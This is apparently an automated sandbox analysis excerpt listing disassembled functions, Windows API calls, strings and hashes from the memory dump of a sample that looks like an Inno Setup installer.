                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CountSleepTick
                                                                                      • String ID:
                                                                                      • API String ID: 2227064392-0
                                                                                      • Opcode ID: a2b42f5d817999fa87d8c8debf1c72a2dd1cd4bafa442c689adcebc18bd8fdf0
                                                                                      • Instruction ID: 455298f4415a448e3fa874f92f6781e0756abc36bce73f1148afe723a625cd3c
                                                                                      • Opcode Fuzzy Hash: a2b42f5d817999fa87d8c8debf1c72a2dd1cd4bafa442c689adcebc18bd8fdf0
                                                                                      • Instruction Fuzzy Hash: C3E06D7230DA4446DA3635BF2C866FB4AACCFC6364B28553FE08DD6282C8984C06956A
                                                                                      Function 00473938 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000,0047BE41,?,?,?,?,?,00493309), ref: 00473941
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000,0047BE41), ref: 00473947
                                                                                      • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000,0047BE41), ref: 00473969
                                                                                      • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000), ref: 0047397A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                      • String ID:
                                                                                      • API String ID: 215268677-0
                                                                                      • Opcode ID: edfe2e214aa3a75ba4a1892ea1e575a857d4468868b2aecbb613d029d339128d
                                                                                      • Instruction ID: bb68efe843bb787bbe1951a3fb92d0835bf9270be0aaf8c05fbae998de9023db
                                                                                      • Opcode Fuzzy Hash: edfe2e214aa3a75ba4a1892ea1e575a857d4468868b2aecbb613d029d339128d
                                                                                      • Instruction Fuzzy Hash: 94F030A16443016BD600EAB5CD82E9B77DCEB44354F04883A7E98D72D1E678DD18AB26
                                                                                      Function 004241B0 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastActivePopup.USER32(?), ref: 004241BC
                                                                                      • IsWindowVisible.USER32(?), ref: 004241CD
                                                                                      • IsWindowEnabled.USER32(?), ref: 004241D7
                                                                                      • SetForegroundWindow.USER32(?), ref: 004241E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                      • String ID:
                                                                                      • API String ID: 2280970139-0
                                                                                      • Opcode ID: fcfbdc667dfc271acfde3df3b5f004a8a61651cac52fe1164ff6abd3c1fed0d2
                                                                                      • Instruction ID: 7a261241521d5f36110480f60a41559dbc21bd8b6604a945fb8666e4bf107b55
                                                                                      • Opcode Fuzzy Hash: fcfbdc667dfc271acfde3df3b5f004a8a61651cac52fe1164ff6abd3c1fed0d2
                                                                                      • Instruction Fuzzy Hash: 0DE08699B06531139E31FA251885ABB25ACCD54B883C60127BC04F7243DF1CCFA0C1AC
                                                                                      Function 00466FA4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00467191
                                                                                      • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 00467197
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$EnableItemSystem
                                                                                      • String ID: CurPageChanged
                                                                                      • API String ID: 3692539535-2490978513
                                                                                      • Opcode ID: b1f316c5989fff7e00d37c5493a715d64e5e6d0b5679f88fc60dbd8090725f93
                                                                                      • Instruction ID: 85229a9a86c8d76f9b88dc92849b92cb22f01a3e3c9a9662cd7f180e88e3a99e
                                                                                      • Opcode Fuzzy Hash: b1f316c5989fff7e00d37c5493a715d64e5e6d0b5679f88fc60dbd8090725f93
                                                                                      • Instruction Fuzzy Hash: AFA1F734614204DFC711DB69D985EE973F5EB49308F2640F6F804AB322EB38AE41EB59
                                                                                      Function 00402088 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlEnterCriticalSection.KERNEL32(00496420,00000000,004021FC), ref: 004020CB
                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00496420,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00496420,00401A89,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                      • String ID: 0'd
                                                                                      • API String ID: 296031713-1261448102
                                                                                      • Opcode ID: c9e83c2416c2ed5bf47c5d563a835639b46c609bf4dc24c8581f363c33cd1986
                                                                                      • Instruction ID: bee6d1afbc099edcb865eebe2e963010dd73383aa86927e532b05753f0ae9538
                                                                                      • Opcode Fuzzy Hash: c9e83c2416c2ed5bf47c5d563a835639b46c609bf4dc24c8581f363c33cd1986
                                                                                      • Instruction Fuzzy Hash: EF41C4B2E003119FDB10CFA9DE8521A7BB4F7A9364B16417BD854A77E1D3789841CB4C
                                                                                      Function 0044FA84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FB19
                                                                                      • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FB4A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteMessageSendShell
                                                                                      • String ID: open
                                                                                      • API String ID: 812272486-2758837156
                                                                                      • Opcode ID: 8a0605ed0c381f0a74a086ec1471ed6555b23fb8dcfb2e81ee34f57c50cf0fe2
                                                                                      • Instruction ID: 724f47e86b4f4745380ee9597168f1c8a72dce230288f2328438c3862ccb2892
                                                                                      • Opcode Fuzzy Hash: 8a0605ed0c381f0a74a086ec1471ed6555b23fb8dcfb2e81ee34f57c50cf0fe2
                                                                                      • Instruction Fuzzy Hash: F8214470E00244AFEB00DF69C992F9EB7F9EF45704F1085BAB500E7391D678BA45CA58
                                                                                      Function 00468AB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Failed to proceed to next wizard page; showing wizard., xrefs: 00468B99
                                                                                      • Failed to proceed to next wizard page; aborting., xrefs: 00468B85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                      • API String ID: 0-1974262853
                                                                                      • Opcode ID: 922b0376bd45f1a340fb446d45ca7413af626e1e06f02045d5dc725511932721
                                                                                      • Instruction ID: be58dce371fc8eb70e9473287a00680558b91856d3b2c3d5b7f8b6b1509d7c4a
                                                                                      • Opcode Fuzzy Hash: 922b0376bd45f1a340fb446d45ca7413af626e1e06f02045d5dc725511932721
                                                                                      • Instruction Fuzzy Hash: 5C218E706042049FDB00EBA9E985E99B7F8EB05714F2541BFF404AB352DB38AE40CB59
                                                                                      Function 00453C84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00453D18
                                                                                      • GetLastError.KERNEL32(0000003C,00000000,00453D61,?,?,00000001,00000001), ref: 00453D29
                                                                                        • Part of subcall function 00453970: WaitForInputIdle.USER32(00000001,00000032), ref: 0045399C
                                                                                        • Part of subcall function 00453970: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004539BE
                                                                                        • Part of subcall function 00453970: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
                                                                                        • Part of subcall function 00453970: CloseHandle.KERNEL32(00000001,004539FA,004539F3,?,00000031,00000080,00000000,?,?,00453D4B,00000080,0000003C,00000000,00453D61), ref: 004539ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                                                                      • String ID: <
                                                                                      • API String ID: 35504260-4251816714
                                                                                      • Opcode ID: 0a489ccbbc1036629311ba8f0fc18be266887183308125755252c1f90736cb03
                                                                                      • Instruction ID: 33ba34e09f30df1b12b73ce0116b213a2e15e307ba7a65c56a6979caf0e15077
                                                                                      • Opcode Fuzzy Hash: 0a489ccbbc1036629311ba8f0fc18be266887183308125755252c1f90736cb03
                                                                                      • Instruction Fuzzy Hash: 3C2153B0600209ABDB11DF65D8826DE7BF8AF09396F50443AF844E7381D7789E49CB98
                                                                                      Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlEnterCriticalSection.KERNEL32(00496420,00000000,)), ref: 004025C7
                                                                                      • RtlLeaveCriticalSection.KERNEL32(00496420,0040263D), ref: 00402630
                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00496420,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00496420,00401A89,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                      • String ID: )
                                                                                      • API String ID: 2227675388-1084416617
                                                                                      • Opcode ID: 3eb0375ff62f3d3bcca9cc60adac25dafbf9b9e3c2e27b1e4b69ca31af3a3358
                                                                                      • Instruction ID: 5893b1754cd22d93ac955961316eccc987691ebf6da7ca014f8aac44d7effe1a
                                                                                      • Opcode Fuzzy Hash: 3eb0375ff62f3d3bcca9cc60adac25dafbf9b9e3c2e27b1e4b69ca31af3a3358
                                                                                      • Instruction Fuzzy Hash: 851101317042046FEB25ABB99F5A62A6AD4D795758B25087FF404F32D2D9BD8C02826C
                                                                                      Function 00446E48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00446EFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$AllocByteCharFreeMultiWide
                                                                                      • String ID: NIL Interface Exception$Unknown Method
                                                                                      • API String ID: 3952431833-1023667238
                                                                                      • Opcode ID: 87cbfea59f1259fc6e468aac4867c83fbc8f3f1cc130e6dbee1779124e49575a
                                                                                      • Instruction ID: 5f9b3b73cb94db711a986a3f2247f7757ae34ed1a40e252d8aaeb61a96a19159
                                                                                      • Opcode Fuzzy Hash: 87cbfea59f1259fc6e468aac4867c83fbc8f3f1cc130e6dbee1779124e49575a
                                                                                      • Instruction Fuzzy Hash: 3E1196706042489FEB10DFA5DC52AAEBBBCEB49704F52407AF900E7681D7799D04CA6A
                                                                                      Function 00490B34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490BFC,?,00490BF0,00000000,00490BD7), ref: 00490BA2
                                                                                      • CloseHandle.KERNEL32(00490C3C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490BFC,?,00490BF0,00000000), ref: 00490BB9
                                                                                        • Part of subcall function 00490A8C: GetLastError.KERNEL32(00000000,00490B24,?,?,?,?), ref: 00490AB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                      • String ID: D
                                                                                      • API String ID: 3798668922-2746444292
                                                                                      • Opcode ID: 248f869aaca6227a9bc77a92f638e1a0db6285b6b497ba8db48b301b6d33914f
                                                                                      • Instruction ID: 99184734163d0c92a4db66637d6494c9b23a30ba7254384d63fd9a46e8a5d762
                                                                                      • Opcode Fuzzy Hash: 248f869aaca6227a9bc77a92f638e1a0db6285b6b497ba8db48b301b6d33914f
                                                                                      • Instruction Fuzzy Hash: 790165B1644248AFDF00EBD1CC42F9FBBACDF48718F51007AB504E7291DA78AE048A58
                                                                                      Function 0042DB9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DBB0
                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DBF0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$EnumQuery
                                                                                      • String ID: Inno Setup: No Icons
                                                                                      • API String ID: 1576479698-2016326496
                                                                                      • Opcode ID: 0890946b5df0c49e4954d7290b96ce305c787ba9704d15fe4295c439bd8e9102
                                                                                      • Instruction ID: 08e9f6bdc79701da45a7e076aae250b208fcb3010747ef376bcb555be2d5621c
                                                                                      • Opcode Fuzzy Hash: 0890946b5df0c49e4954d7290b96ce305c787ba9704d15fe4295c439bd8e9102
                                                                                      • Instruction Fuzzy Hash: F5018431B8933069F73045266D41F6B558C9B85B64F65003BFA41AA3C0D6DCDC45E26A
                                                                                      Function 00491FC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00453FD0: GetCurrentProcess.KERNEL32(00000028), ref: 00453FDF
                                                                                        • Part of subcall function 00453FD0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453FE5
                                                                                      • SetForegroundWindow.USER32(?), ref: 00491FF3
                                                                                      Strings
                                                                                      • Restarting Windows., xrefs: 00491FD0
                                                                                      • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049201E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                      • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                      • API String ID: 3179053593-4147564754
                                                                                      • Opcode ID: 92e7afcc8831688dae5fd262e04e4039765fdd7336fda1d0c24d127371dd9238
                                                                                      • Instruction ID: 09758fc62953ac5564f253f86018d0961132e27bbb4a61923f7fbbecd85c55b8
                                                                                      • Opcode Fuzzy Hash: 92e7afcc8831688dae5fd262e04e4039765fdd7336fda1d0c24d127371dd9238
                                                                                      • Instruction Fuzzy Hash: 7701BC747042807AEB01EB65EA02B9C2FA89B4430DF80407BF500AB293C6BD9A49C72D
                                                                                      Function 004713F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00496628,00492DAD,00000000,00492E02,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00471456
                                                                                        • Part of subcall function 004712A8: GetLastError.KERNEL32(00000000,00471394,?,?,?,00497138,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0047141B,00000001), ref: 004712C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DeleteErrorLastMove
                                                                                      • String ID: DeleteFile$MoveFile
                                                                                      • API String ID: 3195829115-139070271
                                                                                      • Opcode ID: 51569406b8907aa8f27be33c1290f694066cffae2399f79e6ee197169eb5c4fe
                                                                                      • Instruction ID: 498d1f86d5cab30c0c02f2f8960253c4d30b0e1e307aae4f7005b10ea634dfd9
                                                                                      • Opcode Fuzzy Hash: 51569406b8907aa8f27be33c1290f694066cffae2399f79e6ee197169eb5c4fe
                                                                                      • Instruction Fuzzy Hash: 3AF062A010411067DF107B6E85836DA239C8F0235EB54C17BBD88BF3A3CA3D9C0287AE
                                                                                      Function 00455C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00455C42
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,.2I,?), ref: 00455C4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$LocalSystem
                                                                                      • String ID: .2I
                                                                                      • API String ID: 1748579591-803348413
                                                                                      • Opcode ID: aba8b51db9d65da12f539ddc2c0835b2624d8a3471dbf7fd6520d9ecd032998b
                                                                                      • Instruction ID: 4f8a786cf5642c40ef90ebfca535d25145d1c27a2836ec24ad6e1980779010cb
                                                                                      • Opcode Fuzzy Hash: aba8b51db9d65da12f539ddc2c0835b2624d8a3471dbf7fd6520d9ecd032998b
